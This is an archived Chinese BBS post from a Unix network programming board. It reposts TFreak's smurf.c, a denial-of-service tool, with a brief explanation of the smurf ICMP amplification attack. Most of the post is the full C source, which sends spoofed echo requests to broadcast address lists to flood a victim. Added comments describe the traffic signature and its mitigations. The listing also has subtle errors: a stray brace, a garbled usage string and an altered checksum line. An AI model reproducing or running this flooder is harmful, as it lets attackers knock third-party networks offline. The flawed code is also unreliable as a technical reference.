<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="337.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security <br>
标 题: [13.0.4] TCP/IP Flooding with Smurf <br>
发信站: 武汉白云黄鹤站 (Tue Oct 10 22:05:24 2000), 站内信件 <br>
Found by TFreak (from ntsecurity.net) <br>
The Problem <br>
The smurf attack is quite simple. It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. <br>
The result is a devastating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo request. <br>
This attack can EASILY saturate a T1 circuit, rendering it completely useless. <br>
HERE IS THE SMURF SOURCE CODE: <br>
* $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $* <br>
* spoofs icmp packets from a host to various broadcast addresses resulting <br>
* in multiple replies to that host from a single packet. <br>
* disclaimer: <br>
* I cannot and will not be held responsible nor legally bound for the <br>
* malicious activities of individuals who come into possession of this <br>
* program and I refuse to provide help or support of any kind and do NOT <br>
* condone use of this program to deny service to anyone or any machine. <br>
* This is for educational use only. Please Don't abuse this. <br>
* TFreak <br>
*/ <br>
#include <signal.h> <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <netinet/in.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_icmp.h> <br>
#include <netdb.h> <br>
#include <ctype.h> <br>
#include <arpa/inet.h> <br>
#include <unistd.h> <br>
#include <string.h> <br>
/* Forward declarations for the helpers defined after main(). */
void banner(void); <br>
void usage(char *); <br>
/* Builds and sends one packet: (socket, source address, destination, payload size). */
void smurf(int, struct sockaddr_in, u_long, int); <br>
/* Installed as the SIGINT handler in main(). */
void ctrlc(int); <br>
unsigned short in_chksum(u_short *, int); <br>
/* stamp */ <br>
/* Revision string; not referenced anywhere else in this listing. */
char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; <br>
/*
 * Entry point. Takes five positional arguments: argv[1] is the host whose
 * address is written into the source field of every packet, argv[2] a file
 * of broadcast addresses, argv[3] the packet count (0 keeps the send loop
 * running), argv[4] the delay between packets and argv[5] the payload size.
 * Exits with -1 when the host cannot be resolved, the file cannot be opened
 * or holds no usable address, the size exceeds 1024, or the socket cannot
 * be created.
 */
int main (int argc, char *argv[]) <br>
{ <br>
struct sockaddr_in sin; <br>
struct hostent *he; <br>
FILE *bcastfile; <br>
int i, sock, bcast, delay, num, pktsize, cycle = 0, x; <br>
/* bcastaddr is a table of string pointers carved out of one 8192-byte allocation. */
char buf[32], **bcastaddr = malloc(8192); <br>
banner(); <br>
/* Ctrl-C is routed to ctrlc(), which prints "Done!" and exits. */
signal(SIGINT, ctrlc); <br>
if (argc < 6) usage(argv[0]); <br>
/* Resolve argv[1]; the resulting address is copied into sin and is what
 * smurf() later writes into ip->saddr. */
if ((he = gethostbyname(argv[1])) == NULL) { <br>
perror("resolving source host"); <br>
exit(-1); <br>
} <br>
memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); <br>
sin.sin_family = AF_INET; <br>
sin.sin_port = htons(0); <br>
/* atoi() reports no errors: a non-numeric argument is read as 0. */
num = atoi(argv[3]); <br>
delay = atoi(argv[4]); <br>
pktsize = atoi(argv[5]); <br>
if ((bcastfile = fopen(argv[2], "r")) == NULL) { <br>
perror("opening bcast file"); <br>
exit(-1); <br>
} <br>
x = 0; <br>
/* Load the address list. Lines that start with '#', a newline or any
 * non-digit are skipped; each kept line is copied into its own 32-byte
 * buffer with the newline replaced by NUL. */
while (!feof(bcastfile)) { <br>
fgets(buf, 32, bcastfile); <br>
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; <br>
for (i = 0; i < strlen(buf); i++) <br>
if (buf[i] == '\n') buf[i] = '\0'; <br>
bcastaddr[x] = malloc(32); <br>
strcpy(bcastaddr[x], buf); <br>
x++; <br>
} <br>
/* Null entry marks the end of the list so the send loop can wrap around. */
bcastaddr[x] = 0x0; <br>
fclose(bcastfile); <br>
if (x == 0) { <br>
fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); <br>
exit(-1); <br>
} <br>
if (pktsize > 1024) { <br>
fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); <br>
exit(-1); <br>
} <br>
/* IPPROTO_RAW raw socket: smurf() supplies the complete IP header itself.
 * On Linux, opening a raw socket requires root or CAP_NET_RAW, so this
 * step fails for an unprivileged account. */
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { <br>
perror("getting socket"); <br>
exit(-1); <br>
} <br>
/* Sets SO_BROADCAST from the value held in bcast; the result is not checked. */
setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); <br>
printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); <br>
/* One packet per iteration, walking the address list round-robin.
 * With num == 0 the condition stays true regardless of i. */
for (i = 0; i < num || !num; i++) { <br>
if (!(i % 25)) { printf("."); fflush(stdout); } <br>
smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); <br>
cycle++; <br>
if (bcastaddr[cycle] == 0x0) cycle = 0; <br>
/* usleep() takes microseconds. */
usleep(delay); <br>
} <br>
puts("\n\n"); <br>
return 0; <br>
} <br>
} <br>
/* Prints the program name and version line to stdout. */
void banner (void) <br>
{ <br>
puts("\nsmurf.c v4.0 by TFreak\n"); <br>
} <br>
/*
 * Prints the argument summary to stderr and exits with status -1.
 *
 * prog: program name substituted for %s in the first line.
 *
 * NOTE(review): the first usage line carries no argument placeholders in this
 * listing; they may have been lost when the post was converted to HTML.
 * NOTE(review): the text gives the delay in ms, while main() passes the value
 * to usleep(), which takes microseconds.
 */
void usage (char *prog) <br>
{ <br>
fprintf(stderr, "usage: %s " <br>
" \n\n" <br>
"target = address to hit\n" <br>
"bcast file = file to read broadcast addresses from\n" <br>
"num packets = number of packets to send (0 = flood)\n" <br>
"packet delay = wait between each packet (in ms)\n" <br>
"packet size = size of packet (< 1024)\n\n", prog); <br>
exit(-1); <br>
} <br>
/*
 * Builds one IPv4 + ICMP packet in a freshly allocated, zeroed buffer and
 * hands it to sendto() on the raw socket.
 *
 * sock:  raw socket opened in main().
 * sin:   address structure whose sin_addr is written into the IP source field.
 * dest:  value written into the IP destination field (main() passes a
 *        broadcast address from the list).
 * psize: number of zero payload bytes after the ICMP header.
 *
 * What this looks like on the wire, for detection and filtering:
 *  - At a network whose broadcast address is on the list: inbound ICMP echo
 *    requests (type 8) addressed to the subnet broadcast address. Routers
 *    that do not forward directed broadcasts (RFC 2644) and hosts that do not
 *    answer broadcast echo requests keep that network from amplifying.
 *  - At the host named in the source field: ICMP echo replies (type 0) that
 *    match no request it sent.
 *  - At the originating network: packets leaving with a source address that
 *    does not belong to it, which source-address validation at the edge
 *    (BCP 38 / RFC 2827) drops.
 */
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) <br>
{ <br>
struct iphdr *ip; <br>
struct icmphdr *icmp; <br>
char *packet; <br>
/* The return value of malloc() is used without a NULL check. */
packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
/* The IP header sits at the start of the buffer, the ICMP header right after it. */
ip = (struct iphdr *)packet; <br>
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); <br>
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); <br>
/* ihl is counted in 32-bit words: 5 words = 20-byte header, no options. */
ip->ihl = 5; <br>
ip->version = 4; <br>
ip->ttl = 255; <br>
ip->tos = 0; <br>
ip->frag_off = 0; <br>
ip->protocol = IPPROTO_ICMP; <br>
/* Source field comes from the caller-supplied sin, not from the sending host. */
ip->saddr = sin.sin_addr.s_addr; <br>
ip->daddr = dest; <br>
ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); <br>
/* ICMP type 8, code 0 is an echo request. */
icmp->type = 8; <br>
icmp->code = 0; <br>
icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); <br>
/* The result of sendto() is not checked. */
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, <br>
0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); <br>
free(packet); /* free willy! */ <br>
} <br>
/*
 * SIGINT handler installed by main(): prints "Done!" and exits with status 1.
 *
 * ignored: signal number; not used.
 */
void ctrlc (int ignored) <br>
{ <br>
puts("\nDone!\n"); <br>
exit(1); <br>
} <br>
/*
 * Checksum helper used for both the IP header and the ICMP message.
 *
 * addr: start of the data, read as consecutive 16-bit words.
 * len:  length of the data in bytes.
 *
 * Returns the bitwise complement of the accumulated sum, truncated to 16 bits.
 */
unsigned short in_chksum (u_short *addr, int len) <br>
{ <br>
register int nleft = len; <br>
register int sum = 0; <br>
u_short answer = 0; <br>
/* Add the data two bytes at a time. */
while (nleft > 1) { <br>
sum += *addr++; <br>
nleft -= 2; <br>
} <br>
/* Odd length: the last byte is placed in the first byte of a zeroed
 * 16-bit word and that word is added. */
if (nleft == 1) { <br>
*(u_char *)(&answer) = *(u_char *)addr; <br>
sum += answer; <br>
} <br>
/* Combine the upper 16 bits of the sum with the running total, as written
 * in this listing, then add the carry once more. */
sum = (sum >> 16) + (sum + 0xffff); <br>
sum += (sum >> 16); <br>
answer = ~sum; <br>
return(answer); <br>
} <br>
-- <br>
</small><hr>
</table>
</body>
</html>